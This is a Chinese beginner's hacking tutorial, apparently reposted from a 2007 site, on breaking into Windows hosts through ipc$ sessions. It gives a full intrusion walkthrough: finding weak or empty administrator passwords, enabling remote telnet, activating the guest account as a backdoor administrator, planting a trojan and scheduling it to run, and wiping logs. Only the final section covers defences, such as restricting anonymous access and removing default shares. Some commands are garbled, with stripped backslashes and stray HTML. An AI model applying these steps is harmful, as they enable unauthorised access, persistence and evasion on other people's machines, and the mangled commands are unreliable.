菜鸟必备:ipc$详细解

发表于:2007-06-23来源:作者:点击数: 标签:
十 一些需要shell才能完成的命令 看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令: 1 向远程主机建立用户,激活用户,修改用户密码,加入管理组

   
  十 一些需要shell才能完成的命令
  
  看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令:
  

  1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成;
  
  2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成;
  
  3 运行/关闭远程主机的服务,需要在shell下完成;
  
  4 启动/杀掉远程主机的进程,也需要在shell下完成。
  
  十一 入侵中可能会用到的相关命令
  
  请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。
  
  1 建立空连接:
  net use \IPipc$ "" /user:""
  
  2 建立非空连接:
  net use \IPipc$ "psw" /user:"aclearcase/" target="_blank" >ccount"
  
  3 查看远程主机的共享资源(但看不到默认共享)
  net view \IP
  
  4 查看本地主机的共享资源(可以看到本地的默认共享)
  net share
  
  5 得到远程主机的用户名列表
  nbtstat -A IP
  
  6 得到本地主机的用户列表
  net user
  
  7 查看远程主机的当前时间
  net time \IP
  
  8 显示本地主机当前服务
  net start
  
  9 启动/关闭本地服务
  net start 服务名 /y
  net stop 服务名 /y
  
  10 映射远程共享:
  net use z: \IPaby
  此命令将共享名为baby的共享资源映射到z盘
  
  11 删除共享映射
  net use c: /del 删除映射的c盘,其他盘类推
  net use * /del /y删除全部
  
  12 向远程主机复制文件
  copy 路径srv.exe \IP共享目录名,如:
  copy ccbirds.exe \*.*.*.*c 即将当前目录下的文件复制到对方c盘内
  
  13 远程添加计划任务
  at \ip 时间 程序名,如:
  at \127.0.0.0 11:00 love.exe
  注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径
  
  14 开启远程主机的telnet
  这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:
  
  1)目标开启了ipc$共享
  2)你要拥有管理员密码和帐号
  3)目标开启RemoteRegistry服务,用户就该ntlm认证
  4)对WIN2K/XP有效,NT未经测试
  命令格式:OpenTelnet.exe \server account psw NTLM认证方式 port
  试例如下:c:>OpenTelnet.exe \*.*.*.* administrator "" 1 90
  
  15 激活用户/加入管理员组
  1 net uesr account /active:yes
  2 net localgroup administrators account /add
  
  16 关闭远程主机的telnet
  同样需要一个小程序:ResumeTelnet.exe
  命令格式:ResumeTelnet.exe \server account psw
  试例如下:c:>ResumeTelnet.exe \*.*.*.* administrator ""
  
  17 删除一个已建立的ipc$连接
  net use \IPipc$ /del
  
  十二 ipc$完整入侵步骤祥解
  
  其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!
  
  1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空
  
  2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧
  
  3上面开telnet的命令没忘吧,要用到opentelnet这个小程序
  c:>OpenTelnet.exe \192.168.21.* administrator "" 1 90
  如果返回如下信息
  *******************************************************
  Remote Telnet Configure, by refdom
  Email: refdom@263.net
  OpenTelnet.exe
  
  Usage:OpenTelnet.exe \server username password NTLMAuthor telnetport
  *******************************************************
  Connecting \192.168.21.*...Successfully!
  
  NOTICE!!!!!!
  The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23
  
  Starting telnet service...
  telnet service is started successfully! telnet service is running!
  
  BINGLE!!!Yeah!!
  Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
  Disconnecting server...Successfully!
  *说明你已经打开了一个端口90的telnet。
  
  4 现在我们telnet上去
  telnet 192.168.21.* 90
  如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了
  
  5 C:>net user guest /active:yes
  *将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no
  
  6 C:>net user guest 1234
  *将Guest的密码改为1234,或者改成你喜欢的密码
  
  7 C:>net localgroup administrators guest /add
  *将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。
  
  8 好了,现在我们来走另一条路,给它传个木马玩玩
  
  9 首先,我们先建立起ipc$连接
  C:>net use \192.168.21.*ipc$ "" /user:administrator
  
  10 既然要上传东西,就要先知道它开了什么共享
  C:>net view \192.168.21.*
  在 \192.168.21.*的共享资源
  资源共享名 类型 用途 注释
  
  C Disk
  D Disk
  命令成功完成。
  *好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。
  
  11 C:>copy love.exe \192.168.21.*c
  已复制 1 个文件
  *用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是最好的了,不容易被发现
  
  12 运行木马前,我们先看看它现在的时间
  net time \192.168.21.*
  \192.168.21.*的当前时间是 2003/8/22 上午 11:00
  命令成功完成
  
  13 现在我们用at运行它吧,不过对方一定要开了Task Scheduler服务(允许程序在指定时间运行),否则就不行了
  C:>at \192.168.21.* 11:02 c:love.exe
  新加了一项作业,其作业 ID = 1
  
  14 剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将可以用图形界面去控制远程主机了,如果连接失败,那么它可能在局域网里,也可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好放弃了
  
  嗯,好了,两种基本方法都讲了。如果你对上面的操作已经轻车熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec执行木马,用命令:psexec \tergetIP -u user -p paswd cmd.exe直接获得shell等,这些都是可以得,随你的便。不过最后不要忘了把日志清理干净,可以用榕哥的elsave.exe。
  讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?看下面
  
  十三 如何防范ipc$入侵
  
  1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)
  
  方法1:
  运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous = DWORD的键值改为:1
  如果设置为"1",一个匿名用户仍然可以连接到IPC$共享,但限制通过这种连接得到列举SAM帐号和共享等信息;在Windows 2000 中增加了"2",限制所有匿名访问除非特别授权,如果设置为2的话,可能会有一些其他问题发生,建议设置为1。如果上面所说的主键不存在,就新建一个再改键值。
  
  方法2:
  在本地安全设置-本地策略-安全选项-在'对匿名连接的额外限制'中做相应设置
  
  2 禁止默认共享
  
  1)察看本地共享资源
  运行-cmd-输入net share
  
  2)删除共享(重起后默认共享仍然存在)
  net share ipc$ /delete
  net share admin$ /delete
  net share c$ /delete
  net share d$ /delete(如果有e,f,……可以继续删除)
  
  3)停止server服务
  net stop server /y (重新启动后server服务会重新开启)
  
  4)禁止自动打开默认共享(此操作并未关闭ipc$共享)
  运行-regedit
  
  server版:找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的键值改为:00000000。
  
  pro版:找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000

原文转自:http://www.ltesting.net